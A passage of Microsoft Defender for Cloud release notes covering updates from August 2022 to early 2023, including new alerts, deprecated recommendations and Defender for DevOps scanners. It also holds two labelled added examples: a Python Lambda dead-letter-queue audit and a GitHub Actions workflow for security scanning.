control over data protection at both the subscription and resource levels. 


Learn more at Overview of Microsoft Defender for Storage. 


Data-aware security posture (preview) 


Microsoft Defender for Cloud helps security teams to be more productive at reducing risks and responding to data breaches in the cloud. It allows them to cut through the noise with data context and prioritize the most critical security risks, preventing a costly data breach. 


• Automatically discover data resources across cloud estate and evaluate their accessibility, data sensitivity and configured data flows. 
• Continuously uncover risks to data breaches of sensitive data resources, exposure or attack paths that could lead to a data resource using a lateral movement technique. 
• Detect suspicious activities that may indicate an ongoing threat to sensitive data resources. 


Learn more about data-aware security posture. 


Improved experience for managing the default Azure security policies 


We introduce an improved Azure security policy management experience for built-in 
recommendations that simplifies the way Defender for Cloud customers fine tune their security 
requirements. The new experience includes the following new capabilities: 


• A simple interface allows better performance and fewer selections when managing default security policies within Defender for Cloud, including enabling/disabling, denying, setting parameters and managing exemptions. 
• A single view of all built-in security recommendations offered by the Microsoft cloud security benchmark (formerly the Azure security benchmark). Recommendations are organized into logical groups, making it easier to understand the types of resources covered, and the relationship between parameters and recommendations. 
• New features such as filters and search have been added. 

Learn how to manage security policies. 


Read the Microsoft Defender for Cloud blog. 


Defender CSPM (Cloud Security Posture Management) is now Generally Available (GA) 


We're announcing that Defender CSPM is now Generally Available (GA). Defender CSPM offers all of 
the services available under the Foundational CSPM capabilities and adds the following benefits: 


• Attack path analysis and ARG API - Attack path analysis uses a graph-based algorithm that scans the cloud security graph to expose attack paths and suggests recommendations as to how best to remediate issues that break the attack path and prevent successful breach. You can also consume attack paths programmatically by querying the Azure Resource Graph (ARG) API. Learn how to use attack path analysis. 
• Cloud Security explorer - Use the Cloud Security Explorer to run graph-based queries on the cloud security graph, to proactively identify security risks in your multicloud environments. Learn more about cloud security explorer. 


Learn more about Defender CSPM. 


Option to create custom recommendations and security standards in Microsoft Defender for Cloud 


Microsoft Defender for Cloud provides the option of creating custom recommendations and standards 
for AWS and GCP using KQL queries. You can use a query editor to build and test queries over your 
data. This feature is part of the Defender CSPM (Cloud Security Posture Management) plan. Learn how 
to create custom recommendations and standards. 


Microsoft cloud security benchmark (MCSB) version 1.0 is now Generally Available (GA) 


Microsoft Defender for Cloud is announcing that the Microsoft cloud security benchmark (MCSB) version 1.0 is now Generally Available (GA). 


MCSB version 1.0 replaces the Azure Security Benchmark (ASB) version 3 as Microsoft Defender for Cloud's default security policy for identifying security vulnerabilities in your cloud environments according to common security frameworks and best practices. MCSB version 1.0 appears as the default compliance standard in the compliance dashboard and is enabled by default for all Defender for Cloud customers. 


You can also learn How Microsoft cloud security benchmark (MCSB) helps you succeed in your cloud security journey. 


Learn more about MCSB. 


Some regulatory compliance standards are now available in government clouds 


We're announcing that the following regulatory standards are being updated to the latest version and are available for customers in Azure Government and Microsoft Azure operated by 21Vianet. 


Azure Government: 


• PCI DSS v4 
• SOC 2 Type 2 
• ISO 27001:2013 


Microsoft Azure operated by 21Vianet: 


• SOC 2 Type 2 
• ISO 27001:2013 


Learn how to Customize the set of standards in your regulatory compliance dashboard. 


New preview recommendation for Azure SQL Servers 


We've added a new recommendation for Azure SQL Servers, Azure SQL Server authentication mode should be Azure Active Directory Only (Preview). 


The recommendation is based on the existing policy Azure SQL Database should have Azure Active Directory Only Authentication enabled. 


This recommendation disables local authentication methods and allows only Azure Active Directory Authentication, which improves security by ensuring that Azure SQL Databases can exclusively be accessed by Azure Active Directory identities. 


Learn how to create servers with Azure AD-only authentication enabled in Azure SQL. 


New alert in Defender for Key Vault 


Defender for Key Vault has the following new alert: 


Alert (alert type)                        Description                                                          MITRE tactics      Severity 
Denied access from a suspicious IP to a   An unsuccessful key vault access has been attempted by an IP that    Credential Access  Low 
key vault                                 has been identified by Microsoft Threat Intelligence as a suspicious 
(KV_SuspiciousIPAccessDenied)             IP address. Though this attempt was unsuccessful, it indicates that 
                                          your infrastructure might have been compromised. We recommend 
                                          further investigations. 


You can see a list of all of the alerts available for Key Vault. 


February 2023 


Updates in February include: 


• Enhanced Cloud Security Explorer 
• Defender for Containers' vulnerability scans of running Linux images now GA 
• Announcing support for the AWS CIS 1.5.0 compliance standard 
• Microsoft Defender for DevOps (preview) is now available in other regions 
• The built-in policy [Preview]: Private endpoint should be configured for Key Vault has been deprecated 


Enhanced Cloud Security Explorer 


An improved version of the cloud security explorer includes a refreshed user experience that removes 
query friction dramatically, added the ability to run multicloud and multi-resource queries, and 
embedded documentation for each query option. 


The Cloud Security Explorer now allows you to run cloud-abstract queries across resources. You can 
use either the prebuilt query templates or use the custom search to apply filters to build your query. 
Learn how to manage Cloud Security Explorer. 


Defender for Containers' vulnerability scans of running Linux images now GA 


Defender for Containers detects vulnerabilities in running containers. Both Windows and Linux 
containers are supported. 


In August 2022, this capability was released in preview for Windows and Linux. It's now released for 
general availability (GA) for Linux. 


When vulnerabilities are detected, Defender for Cloud generates the following security recommendation listing the scan's findings: Running container images should have vulnerability findings resolved. 


Learn more about viewing vulnerabilities for running images. 


Announcing support for the AWS CIS 1.5.0 compliance standard 


Defender for Cloud now supports the CIS Amazon Web Services Foundations v1.5.0 compliance 
standard. The standard can be added to your Regulatory Compliance dashboard, and builds on MDC's 
existing offerings for multicloud recommendations and standards. 


This new standard includes both existing and new recommendations that extend Defender for Cloud's 
coverage to new AWS services and resources. 


Learn how to Manage AWS assessments and standards. 


Microsoft Defender for DevOps (preview) is now available in other regions 


Microsoft Defender for DevOps has expanded its preview and is now available in the West Europe and 
East Australia regions, when you onboard your Azure DevOps and GitHub resources. 


Learn more about Microsoft Defender for DevOps. 


The built-in policy [Preview]: Private endpoint should be configured for Key Vault has been deprecated 


The built-in policy [Preview]: Private endpoint should be configured for Key Vault has been deprecated and has been replaced with the [Preview]: Azure Key Vaults should use private link policy. 


Learn more about integrating Azure Key Vault with Azure Policy. 


January 2023 


Updates in January include: 


• The Endpoint protection (Microsoft Defender for Endpoint) component is now accessed in the Settings and monitoring page 
• New version of the recommendation to find missing system updates (Preview) 
• Cleanup of deleted Azure Arc machines in connected AWS and GCP accounts 
• Allow continuous export to Event Hubs behind a firewall 
• The name of the Secure score control Protect your applications with Azure advanced networking solutions has been changed 
• The policy Vulnerability Assessment settings for SQL server should contain an email address to receive scan reports has been deprecated 
• Recommendation to enable diagnostic logs for Virtual Machine Scale Sets has been deprecated 


The Endpoint protection (Microsoft Defender for Endpoint) component is now accessed in the Settings and monitoring page 


To access Endpoint protection, navigate to Environment settings > Defender plans > Settings and 
monitoring. From here you can set Endpoint protection to On. You can also see all of the other 
components that are managed. 


Learn more about enabling Microsoft Defender for Endpoint on your servers with Defender for Servers. 


New version of the recommendation to find missing system updates (Preview) 


You no longer need an agent on your Azure VMs and Azure Arc machines to make sure the machines 
have all of the latest security or critical system updates. 


The new system updates recommendation, System updates should be installed on your machines (powered by Azure Update Manager) in the Apply system updates control, is based on the Update Manager (preview). The recommendation relies on a native agent embedded in every Azure VM and Azure Arc machine instead of an installed agent. The Quick Fix in the new recommendation leads you to a one-time installation of the missing updates in the Update Manager portal. 


To use the new recommendation, you need to: 


• Connect your non-Azure machines to Arc 
• Turn on the periodic assessment property. You can use the Quick Fix in the new recommendation, Machines should be configured to periodically check for missing system updates, to fix the recommendation. 


The existing "System updates should be installed on your machines" recommendation, which relies on 
the Log Analytics agent, is still available under the same control. 


Cleanup of deleted Azure Arc machines in connected AWS and GCP accounts 


A machine connected to an AWS or GCP account that is covered by Defender for Servers or Defender for SQL on machines is represented in Defender for Cloud as an Azure Arc machine. Until now, that machine wasn't deleted from the inventory when the machine was deleted from the AWS or GCP account, which left unnecessary Azure Arc resources in Defender for Cloud representing deleted machines. 


Defender for Cloud will now automatically delete Azure Arc machines when those machines are deleted in the connected AWS or GCP account. 


Allow continuous export to Event Hubs behind a firewall 


You can now enable the continuous export of alerts and recommendations, as a trusted service to 
Event Hubs that are protected by an Azure firewall. 


You can enable continuous export as the alerts or recommendations are generated. You can also define 
a schedule to send periodic snapshots of all of the new data. 


Learn how to enable continuous export to Event Hubs behind an Azure firewall. 


The name of the Secure score control Protect your applications with Azure advanced networking solutions has been changed 


The secure score control, Protect your applications with Azure advanced networking solutions, has been changed to Protect applications against DDoS attacks. 


The updated name is reflected on Azure Resource Graph (ARG), Secure Score Controls API and the Download CSV report. 


The policy Vulnerability Assessment settings for SQL server should 
contain an email address to receive scan reports has been 
deprecated 


The policy Vulnerability Assessment settings for SQL server should contain an email address to receive scan reports has been deprecated.

The Defender for SQL vulnerability assessment email report is still available and existing email configurations haven't changed.


Recommendation to enable diagnostic logs for Virtual Machine 
Scale Sets has been deprecated 


The recommendation Diagnostic logs in Virtual Machine Scale Sets should be enabled has been deprecated.

The related policy definition has also been deprecated from any standards displayed in the regulatory compliance dashboard.

Recommendation | Description | Severity
Diagnostic logs in Virtual Machine Scale Sets should be enabled | Enable logs and retain them for up to a year, enabling you to recreate activity trails for investigation purposes when a security incident occurs or your network is compromised. | Low


December 2022 


Updates in December include:

- Announcing express configuration for vulnerability assessment in Defender for SQL


Announcing express configuration for vulnerability assessment in 
Defender for SQL 


The express configuration for vulnerability assessment in Microsoft Defender for SQL provides security teams with a streamlined configuration experience on Azure SQL Databases and Dedicated SQL Pools outside of Synapse Workspaces.

With the express configuration experience for vulnerability assessments, security teams can:

- Complete the vulnerability assessment configuration in the security configuration of the SQL resource, without any other settings or dependencies on customer-managed storage accounts.
- Immediately add scan results to baselines so that the status of the finding changes from Unhealthy to Healthy without rescanning a database.
- Add multiple rules to baselines at once and use the latest scan results.
- Enable vulnerability assessment for all Azure SQL Servers when you turn on Microsoft Defender for databases at the subscription level.


Learn more about Defender for SQL vulnerability assessment. 


November 2022 


Updates in November include:

- Protect containers across your GCP organization with Defender for Containers
- Validate Defender for Containers protections with sample alerts
- Governance rules at scale (Preview)
- The ability to create custom assessments in AWS and GCP (Preview) has been deprecated
- The recommendation to configure dead-letter queues for Lambda functions has been deprecated


Protect containers across your GCP organization with Defender for 
Containers 


Now you can enable Defender for Containers for your GCP environment to protect standard GKE clusters across an entire GCP organization. Just create a new GCP connector with Defender for Containers enabled, or enable Defender for Containers on an existing organization-level GCP connector.


Learn more about connecting GCP projects and organizations to Defender for Cloud. 


Validate Defender for Containers protections with sample alerts 


You can now also create sample alerts for the Defender for Containers plan. The new sample alerts are presented as coming from AKS, Arc-connected clusters, EKS, and GKE resources with different severities and MITRE tactics. You can use the sample alerts to validate security alert configurations, such as SIEM integrations, workflow automation, and email notifications.


Learn more about alert validation. 


Governance rules at scale (Preview) 


We're happy to announce the new ability to apply governance rules at scale (Preview) in Defender for Cloud.

With this new experience, security teams can define governance rules in bulk for various scopes (subscriptions and connectors). Security teams can accomplish this task by using management scopes such as Azure management groups, AWS top-level accounts or GCP organizations.

Additionally, the Governance rules (Preview) page presents all of the available governance rules that are effective in the organization's environments.

Learn more about the new governance rules at-scale experience.


Note

As of January 1, 2023, in order to experience the capabilities offered by Governance, you must have the Defender CSPM plan enabled on your subscription or connector.


The ability to create custom assessments in AWS and GCP 
(Preview) has been deprecated 


The ability to create custom assessments for AWS accounts and GCP projects, which was a Preview feature, has been deprecated.


The recommendation to configure dead-letter queues for Lambda 
functions has been deprecated 


The recommendation Lambda functions should have a dead-letter queue configured has been deprecated.

Recommendation | Description | Severity
Lambda functions should have a dead-letter queue configured | This control checks whether a Lambda function is configured with a dead-letter queue. The control fails if the Lambda function isn't configured with a dead-letter queue. As an alternative to an on-failure destination, you can configure your function with a dead-letter queue to save discarded events for further processing. A dead-letter queue acts the same as an on-failure destination. It's used when an event fails all processing attempts or expires without being processed. A dead-letter queue allows you to look back at errors or failed requests to your Lambda function to debug or identify unusual behavior. From a security perspective, it's important to understand why your function failed and to ensure that your function doesn't drop data or compromise data security as a result. For example, if your function can't communicate with an underlying resource, that could be a symptom of a denial of service (DoS) attack elsewhere in the network. | Medium
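The check that the deprecated recommendation performed is simple enough to keep running yourself once it disappears from Defender for Cloud. The following is an added example, not code from the Defender for Cloud documentation or from Microsoft: it reimplements the control over Lambda function configurations in the shape that boto3's `list_functions` returns (a dead-letter queue appears as `DeadLetterConfig: {"TargetArn": ...}`). The three sample records are constructed for this example; `iter_functions` shows how the same check would be fed from a live account and is the only part that needs boto3.

```python
"""Audit Lambda functions for a missing dead-letter queue (DLQ).

Added example; not Microsoft's or AWS's code. The control logic mirrors the
deprecated Defender for Cloud recommendation: a function passes only when it
has a DeadLetterConfig with a non-empty TargetArn.
"""
from typing import Iterable, Iterator

# Constructed sample data in the shape of boto3 ``list_functions()["Functions"]``.
SAMPLE_FUNCTIONS = [
    {
        "FunctionName": "order-processor",
        "FunctionArn": "arn:aws:lambda:us-east-1:123456789012:function:order-processor",
        "DeadLetterConfig": {
            "TargetArn": "arn:aws:sqs:us-east-1:123456789012:order-processor-dlq"
        },
    },
    {
        "FunctionName": "image-resizer",
        "FunctionArn": "arn:aws:lambda:us-east-1:123456789012:function:image-resizer",
        # No DeadLetterConfig key at all: failed async events are silently dropped.
    },
    {
        "FunctionName": "nightly-report",
        "FunctionArn": "arn:aws:lambda:us-east-1:123456789012:function:nightly-report",
        # Key present but empty: the shape you get after a DLQ has been removed.
        "DeadLetterConfig": {},
    },
]


def has_dead_letter_queue(function_config: dict) -> bool:
    """True when the function has a DeadLetterConfig with a non-empty TargetArn."""
    target = (function_config.get("DeadLetterConfig") or {}).get("TargetArn", "")
    return bool(target)


def functions_without_dlq(function_configs: Iterable[dict]) -> list:
    """Return one Medium-severity finding per function that lacks a DLQ."""
    findings = []
    for cfg in function_configs:
        if has_dead_letter_queue(cfg):
            continue
        findings.append({
            "resource": cfg["FunctionArn"],
            "severity": "Medium",
            "message": (
                f"Lambda function {cfg['FunctionName']} has no dead-letter queue; "
                "failed or expired asynchronous invocations will be discarded."
            ),
        })
    return findings


def iter_functions(lambda_client) -> Iterator[dict]:
    """Page through a live account. ``lambda_client`` is ``boto3.client('lambda')``.

    Not used by the offline run above; shown so the audit can be pointed at
    real data with a single substitution.
    """
    paginator = lambda_client.get_paginator("list_functions")
    for page in paginator.paginate():
        yield from page["Functions"]


if __name__ == "__main__":
    for finding in functions_without_dlq(SAMPLE_FUNCTIONS):
        print(f"[{finding['severity']}] {finding['resource']}: {finding['message']}")
```

Treating an empty `DeadLetterConfig` as a failure matters: removing a DLQ leaves the key behind, and a check that only tests for the key's presence would report the function as healthy.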


October 2022 


Updates in October include:

- Announcing the Microsoft cloud security benchmark
- Attack path analysis and contextual security capabilities in Defender for Cloud (Preview)
- Agentless scanning for Azure and AWS machines (Preview)
- Defender for DevOps (Preview)
- Regulatory Compliance Dashboard now supports manual control management and detailed information on Microsoft's compliance status
- Auto-provisioning has been renamed to Settings & monitoring and has an updated experience
- Defender Cloud Security Posture Management (CSPM) (Preview)
- MITRE ATT&CK framework mapping is now available also for AWS and GCP security recommendations
- Defender for Containers now supports vulnerability assessment for Elastic Container Registry (Preview)


Announcing the Microsoft cloud security benchmark 


The Microsoft cloud security benchmark (MCSB) is a new framework that defines fundamental cloud security principles based on common industry standards and compliance frameworks, together with detailed technical guidance for implementing these best practices across cloud platforms. MCSB replaces the Azure Security Benchmark. It provides prescriptive details for how to implement its cloud-agnostic security recommendations on multiple cloud service platforms, initially covering Azure and AWS.


You can now monitor your cloud security compliance posture per cloud in a single, integrated 
dashboard. You can see MCSB as the default compliance standard when you navigate to Defender for 
Cloud's regulatory compliance dashboard. 


Microsoft cloud security benchmark is automatically assigned to your Azure subscriptions and AWS 
accounts when you onboard Defender for Cloud. 


Learn more about the Microsoft cloud security benchmark. 


Attack path analysis and contextual security capabilities in 
Defender for Cloud (Preview) 


The new cloud security graph, attack path analysis and contextual cloud security capabilities are now 
available in Defender for Cloud in preview. 


One of the biggest challenges that security teams face today is the number of security issues they face 
on a daily basis. There are numerous security issues that need to be resolved and never enough 
resources to address them all. 


Defender for Cloud's new cloud security graph and attack path analysis capabilities give security teams the ability to assess the risk behind each security issue and to identify the highest-risk issues that need to be resolved soonest. Defender for Cloud works with security teams to reduce the risk of an impactful breach to their environment in the most effective way.


Learn more about the new cloud security graph, attack path analysis, and the cloud security explorer. 


Agentless scanning for Azure and AWS machines (Preview) 


Until now, Defender for Cloud based its posture assessments for VMs on agent-based solutions. To help customers maximize coverage and reduce onboarding and management friction, we're releasing agentless scanning for VMs to preview.

With agentless scanning for VMs, you get wide visibility into installed software and software CVEs. You get the visibility without the challenges of agent installation and maintenance, network connectivity requirements, and performance impact on your workloads. The analysis is powered by Microsoft Defender Vulnerability Management.


Agentless vulnerability scanning is available in both Defender Cloud Security Posture Management 
(CSPM) and in Defender for Servers P2, with native support for AWS and Azure VMs. 


e Learn more about agentless scanning. 
e Find out how to enable agentless vulnerability assessment. 


Defender for DevOps (Preview) 


Microsoft Defender for Cloud enables comprehensive visibility, posture management, and threat 
protection across hybrid and multicloud environments including Azure, AWS, Google, and on-premises 
resources. 


Now, the new Defender for DevOps plan integrates source code management systems, like GitHub and 
Azure DevOps, into Defender for Cloud. With this new integration, we're empowering security teams to 
protect their resources from code to cloud. 


Defender for DevOps allows you to gain visibility into and manage your connected developer 
environments and code resources. Currently, you can connect Azure DevOps and GitHub systems to 
Defender for Cloud and onboard DevOps repositories to Inventory and the new DevOps Security page. 
It provides security teams with a high-level overview of the discovered security issues that exist within 
them in a unified DevOps Security page. 


Security teams can now configure pull request annotations to help developers address secret scanning findings in Azure DevOps directly on their pull requests.

You can configure the Microsoft Security DevOps tools on Azure Pipelines and GitHub workflows to enable the following security scans:


Name | Language | License
Bandit | Python | Apache License 2.0
BinSkim | Binary - Windows, ELF | MIT License
ESlint | JavaScript | MIT License
CredScan (Azure DevOps only) | Credential Scanner (also known as CredScan) is a tool developed and maintained by Microsoft to identify credential leaks such as those in source code and configuration files. Common types: default passwords, SQL connection strings, certificates with private keys | Not open source
Template Analyzer | ARM template, Bicep file | MIT License
Terrascan | Terraform (HCL2), Kubernetes (JSON/YAML), Helm v3, Kustomize, Dockerfiles, CloudFormation | Apache License 2.0
Trivy | Container images, file systems, git repositories | Apache License 2.0
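As an added example (not a workflow from the Defender for Cloud documentation or from the Microsoft Security DevOps project), the following GitHub Actions workflow runs the Microsoft Security DevOps action on every push and pull request and uploads its SARIF output to the repository's Security tab, which is where the Defender for DevOps recommendations read findings from. The action name, its `tools` input and its `sarifFile` output are taken from the action's published usage and should be checked against the action's README for the version you pin; the branch name, the .NET version and the particular tool selection are this example's choices.

```yaml
# Added example, not from the Defender for Cloud docs.
name: Microsoft Security DevOps

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

permissions:
  contents: read
  security-events: write   # required for upload-sarif to write to the Security tab

jobs:
  msdo:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v3

      # The MSDO CLI is a .NET tool; pin a runtime so runs are reproducible.
      - uses: actions/setup-dotnet@v3
        with:
          dotnet-version: 6.0.x

      - name: Run Microsoft Security DevOps
        uses: microsoft/security-devops-action@latest
        id: msdo
        with:
          # Example selection from the table above: source (Bandit),
          # IaC (Template Analyzer, Terrascan) and container/filesystem (Trivy).
          tools: bandit,templateanalyzer,terrascan,trivy

      - name: Upload results to the GitHub Security tab
        uses: github/codeql-action/upload-sarif@v2
        with:
          sarif_file: ${{ steps.msdo.outputs.sarifFile }}
```

Pin `microsoft/security-devops-action` to a release tag rather than `@latest` once you have validated a version, so that a scanner update cannot silently change what your pipeline gates on.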


The following new recommendations are now available for DevOps:

Recommendation | Description | Severity
(Preview) Code repositories should have code scanning findings resolved | Defender for DevOps has found vulnerabilities in code repositories. To improve the security posture of the repositories, it's highly recommended to remediate these vulnerabilities. (No related policy) | Medium
(Preview) Code repositories should have secret scanning findings resolved | Defender for DevOps has found a secret in code repositories. This should be remediated immediately to prevent a security breach. Secrets found in repositories can be leaked or discovered by adversaries, leading to compromise of an application or service. For Azure DevOps, the Microsoft Security DevOps CredScan tool only scans builds on which it has been configured to run. Therefore, results may not reflect the complete status of secrets in your repositories. (No related policy) | High
(Preview) Code repositories should have Dependabot scanning findings resolved | Defender for DevOps has found vulnerabilities in code repositories. To improve the security posture of the repositories, it's highly recommended to remediate these vulnerabilities. (No related policy) | Medium
(Preview) Code repositories should have infrastructure as code scanning findings resolved | (Preview) Code repositories should have infrastructure as code scanning findings resolved | Medium
(Preview) GitHub repositories should have code scanning enabled | GitHub uses code scanning to analyze code in order to find security vulnerabilities and errors in code. Code scanning can be used to find, triage, and prioritize fixes for existing problems in your code. Code scanning can also prevent developers from introducing new problems. Scans can be scheduled for specific days and times, or scans can be triggered when a specific event occurs in the repository, such as a push. If code scanning finds a potential vulnerability or error in code, GitHub displays an alert in the repository. A vulnerability is a problem in a project's code that could be exploited to damage the confidentiality, integrity, or availability of the project. (No related policy) | Medium
(Preview) GitHub repositories should have secret scanning enabled | GitHub scans repositories for known types of secrets, to prevent fraudulent use of secrets that were accidentally committed to repositories. Secret scanning will scan the entire Git history on all branches present in the GitHub repository for any secrets. Examples of secrets are tokens and private keys that a service provider can issue for authentication. If a secret is checked into a repository, anyone who has read access to the repository can use the secret to access the external service with those privileges. Secrets should be stored in a dedicated, secure location outside the repository for the project. (No related policy) | High
(Preview) GitHub repositories should have Dependabot scanning enabled | GitHub sends Dependabot alerts when it detects vulnerabilities in code dependencies that affect repositories. A vulnerability is a problem in a project's code that could be exploited to damage the confidentiality, integrity, or availability of the project or other projects that use its code. Vulnerabilities vary in type, severity, and method of attack. When code depends on a package that has a security vulnerability, this vulnerable dependency can cause a range of problems. (No related policy) | Medium


The Defender for DevOps recommendations replaced the deprecated vulnerability scanner for CI/CD 
workflows that was included in Defender for Containers. 


Learn more about Defender for DevOps 


Regulatory Compliance dashboard now supports manual control 
management and detailed information on Microsoft's compliance 
status 


The compliance dashboard in Defender for Cloud is a key tool for customers to help them understand and track their compliance status. Customers can continuously monitor environments in accordance with requirements from many different standards and regulations.

Now, you can fully manage your compliance posture by manually attesting to operational and non-technical controls. You can now provide evidence of compliance for controls that aren't automated. Together with the automated assessments, you can now generate a full report of compliance within a selected scope, addressing the entire set of controls for a given standard.


In addition, with richer control information and in-depth details and evidence for Microsoft's 
compliance status, you now have all of the information required for audits at your fingertips. 


Some of the new benefits include: 


- Manual customer actions provide a mechanism for manually attesting compliance with non-automated controls, including the ability to link evidence, set a compliance date and set an expiration date.
- Richer control details for supported standards that showcase Microsoft actions and manual customer actions in addition to the already existing automated customer actions.
- Microsoft actions provide transparency into Microsoft's compliance status, including audit assessment procedures, test results, and Microsoft responses to deviations.
- Compliance offerings provide a central location to check Azure, Dynamics 365, and Power Platform products and their respective regulatory compliance certifications.


Learn more on how to Improve your regulatory compliance with Defender for Cloud. 


Auto-provisioning has been renamed to Settings & monitoring and 
has an updated experience 


We've renamed the Auto-provisioning page to Settings & monitoring. 


Auto-provisioning was meant to allow at-scale enablement of prerequisites, which are needed by Defender for Cloud's advanced features and capabilities. To better support our expanded capabilities, we're launching a new experience with the following changes.

The Defender plans page now includes:

- When you enable a Defender plan that requires monitoring components, those components are enabled for automatic provisioning with default settings. These settings can optionally be edited at any time.
- You can access the monitoring component settings for each Defender plan from the Defender plan page.
- The Defender plans page clearly indicates whether all the monitoring components are in place for each Defender plan, or if your monitoring coverage is incomplete.

The Settings & monitoring page:

- Each monitoring component indicates the Defender plans to which it's related.


Learn more about managing your monitoring settings. 


Defender Cloud Security Posture Management (CSPM) 


One of Microsoft Defender for Cloud's main pillars for cloud security is Cloud Security Posture 
Management (CSPM). CSPM provides you with hardening guidance that helps you efficiently and 
effectively improve your security. CSPM also gives you visibility into your current security situation. 


We're announcing a new Defender plan: Defender CSPM. This plan enhances the security capabilities of Defender for Cloud and includes the following new and expanded features:

- Continuous assessment of the security configuration of your cloud resources
- Security recommendations to fix misconfigurations and weaknesses
- Secure score
- Governance
- Regulatory compliance
- Cloud security graph
- Attack path analysis
- Agentless scanning for machines


Learn more about the Defender CSPM plan. 


MITRE ATT&CK framework mapping is now available also for AWS 
and GCP security recommendations 


For security analysts, it's essential to identify the potential risks associated with security 
recommendations and understand the attack vectors, so that they can efficiently prioritize their tasks. 


Defender for Cloud makes prioritization easier by mapping the Azure, AWS and GCP security recommendations against the MITRE ATT&CK framework. The MITRE ATT&CK framework is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations, allowing customers to strengthen the secure configuration of their environments.

The MITRE ATT&CK framework has been integrated in the following ways:

- Recommendations map to MITRE ATT&CK tactics and techniques.
- You can query the MITRE ATT&CK tactics and techniques on recommendations using Azure Resource Graph.


[Screenshot: the recommendation details page for Hardware MFA should be enabled for the "root" account (an AWS recommendation), showing severity Low, a freshness interval of 6 hours, the tactic Credential Access with the technique Brute Force (T1110), the description, remediation steps, and five unhealthy AWS account resources.]

Defender for Containers now supports vulnerability assessment for 
Elastic Container Registry (Preview) 


Microsoft Defender for Containers now provides agentless vulnerability assessment scanning for Elastic Container Registry (ECR) in Amazon AWS. This expands coverage for multicloud environments, building on the release earlier this year of advanced threat protection and Kubernetes environment hardening for AWS and Google GCP. The agentless model creates AWS resources in your accounts to scan your images without extracting images out of your AWS accounts and with no footprint on your workload.

Agentless vulnerability assessment scanning for images in ECR repositories helps reduce the attack surface of your containerized estate by continuously scanning images to identify and manage container vulnerabilities. With this new release, Defender for Cloud scans container images after they're pushed to the repository and continually reassesses the ECR container images in the registry. The findings are available in Microsoft Defender for Cloud as recommendations, and you can use Defender for Cloud's built-in automated workflows to take action on the findings, such as opening a ticket for fixing a high severity vulnerability in an image.


Learn more about vulnerability assessment for Amazon ECR images. 


September 2022 


Updates in September include:

- Suppress alerts based on Container and Kubernetes entities
- Defender for Servers supports File Integrity Monitoring with Azure Monitor Agent
- Legacy Assessments APIs deprecation
- Extra recommendations added to identity
- Removed security alerts for machines reporting to cross-tenant Log Analytics workspaces


Suppress alerts based on Container and Kubernetes entities 


Alert suppression rules can now be scoped to the following container and Kubernetes entities:

- Kubernetes Namespace
- Kubernetes Pod
- Kubernetes Secret
- Kubernetes ServiceAccount
- Kubernetes ReplicaSet
- Kubernetes StatefulSet
- Kubernetes DaemonSet
- Kubernetes Job
- Kubernetes CronJob


Learn more about alert suppression rules. 


Defender for Servers supports File Integrity Monitoring with Azure 
Monitor Agent 


File integrity monitoring (FIM) examines operating system files and registries for changes that might 
indicate an attack. 


FIM is now available in a new version based on Azure Monitor Agent (AMA), which you can deploy 
through Defender for Cloud. 


Learn more about File Integrity Monitoring with the Azure Monitor Agent. 


Legacy Assessments APIs deprecation 
The following APIs are deprecated:

- Security Tasks
- Security Statuses
- Security Summaries

These three APIs exposed old formats of assessments and are replaced by the Assessments API and SubAssessments API. All data that is exposed by these legacy APIs is also available in the new APIs.


Extra recommendations added to identity 


Defender for Cloud has updated its recommendations for improving the management of users and accounts.

New recommendations

The new release contains the following capabilities:

- Extended evaluation scope - Coverage has been improved for identity accounts without MFA and external accounts on Azure resources (instead of subscriptions only), which allows your security administrators to view role assignments per account.
- Improved freshness interval - The identity recommendations now have a freshness interval of 12 hours.
- Account exemption capability - Defender for Cloud has many features you can use to customize your experience and ensure that your secure score reflects your organization's security priorities. For example, you can exempt resources and recommendations from your secure score. This update allows you to exempt specific accounts from evaluation with the recommendations listed in the following table.

  Typically, you'd exempt emergency "break glass" accounts from MFA recommendations, because such accounts are often deliberately excluded from an organization's MFA requirements. Alternatively, you might have external accounts that you'd like to permit access to, that don't have MFA enabled.

Tip

When you exempt an account, it won't be shown as unhealthy and also won't cause a subscription to appear unhealthy.


Recommendation | Assessment key
Accounts with owner permissions on Azure resources should be MFA enabled | 6240402e-f77c-46fa-9060-a7ce53997754
Accounts with write permissions on Azure resources should be MFA enabled | c0cb17b2-0607-48a7-b0e0-903ed22de39b
Accounts with read permissions on Azure resources should be MFA enabled | dabc9bc4-b8a8-45bd-9a5a-43000df8aa1c
Guest accounts with owner permissions on Azure resources should be removed | 20606e75-05c4-48c0-9d97-add6daa2109a
Guest accounts with write permissions on Azure resources should be removed | 0354476c-a12a-4fcc-a79d-f0ab7ffffdbb
Guest accounts with read permissions on Azure resources should be removed | fde1c0c9-0fd2-4ecc-87b5-98956cbc1095
Blocked accounts with owner permissions on Azure resources should be removed | 050ac097-3dda-4d24-ab6d-82568e7a50cf
Blocked accounts with read and write permissions on Azure resources should be removed | 1ff0b4c9-ed56-4de6-be9c-d7ab39645926

The recommendations, although in preview, appear next to the recommendations that are currently GA.


Removed security alerts for machines reporting to cross-tenant 
Log Analytics workspaces 


In the past, Defender for Cloud let you choose the workspace that your Log Analytics agents report to. 
When a machine belonged to one tenant (“Tenant A”) but its Log Analytics agent reported to a 
workspace in a different tenant (“Tenant B”), security alerts about the machine were reported to the 
first tenant (“Tenant A”). 


With this change, alerts on machines connected to Log Analytics workspace in a different tenant no 
longer appear in Defender for Cloud. 


If you want to continue receiving the alerts in Defender for Cloud, connect the Log Analytics agent of 
the relevant machines to the workspace in the same tenant as the machine. 


Learn more about security alerts. 


August 2022 


Updates in August include:

- Vulnerabilities for running images are now visible with Defender for Containers on your Windows containers
- Azure Monitor Agent integration now in preview
- Deprecated VM alerts regarding suspicious activity related to a Kubernetes cluster


Vulnerabilities for running images are now visible with Defender 
for Containers on your Windows containers 


Defender for Containers now shows vulnerabilities for running Windows containers. 


When vulnerabilities are detected, Defender for Cloud generates the following security recommendation listing the detected issues: Running container images should have vulnerability findings resolved.


Learn more about viewing vulnerabilities for running images. 


Azure Monitor Agent integration now in preview 


Defender for Cloud now includes preview support for the Azure Monitor Agent (AMA). AMA is 
intended to replace the legacy Log Analytics agent (also referred to as the Microsoft Monitoring Agent 
(MMA)), which is on a path to deprecation. AMA provides many benefits over legacy agents. 


